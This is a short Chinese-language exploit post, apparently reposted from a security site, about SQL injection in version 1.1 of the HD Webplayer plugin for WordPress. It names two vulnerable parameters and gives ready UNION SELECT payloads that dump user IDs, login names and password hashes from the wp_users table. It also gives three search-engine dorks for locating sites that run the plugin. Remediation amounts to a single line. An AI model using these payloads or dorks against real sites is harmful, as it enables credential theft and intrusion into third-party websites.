标题 Wordpress HD Webplayer 1.1 SQL Injection 作者: JoinSe7en 程序官网: http://www.hdwebplayer.com/ 软件连接: http://hdwebplayer.com/downloads/hdwebplayer_wordpress_1.1.zip 影响版本: version 1.1 已测试系统: Windows 7, Backtrack 5 r3
+----------------------------------------------------------------------+ | 缺陷1 - config.php | +----------------------------------------------------------------------+
# Location:
http://www.2cto.com /wp-content/plugins/hd-webplayer/config.php?id= [INJECT HERE]
# Exploit Code:
config.php?id=1+/*!UNION*/+/*!SELECT*/+1,2,3,group_concat(ID,0x3a,user_login,0x3a,user_pass,0x3b),5,6,7+from+wp_users //Number of columns may be different
+----------------------------------------------------------------------+ | 缺陷 2 - playlist.php | +----------------------------------------------------------------------+
# Location:
http://www.2cto.com /wp-content/plugins/hd-webplayer/playlist.php?videoid= [INJECT HERE]
# Exploit Code:
playlist.php?videoid=1+/*!UNION*/+/*!SELECT*/+group_concat(ID,0x3a,user_login,0x3a,user_pass,0x3b),2,3,4,5,6,7+from+wp_users //Number of columns may be different
三个不同的搜索关键词:
# Dork 1 (config.php) inurl:"/wp-content/plugins/hd-webplayer/config.php?id="
# Dork 2 (playlist.php) inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="
# Dork 3 (General): inurl:"/wp-content/plugins/hd-webplayer/"
修复:针对性过滤
查看更多关于Wordpress HD Webplayer 1.1 SQL注射及修复 - 网站安全的详细内容...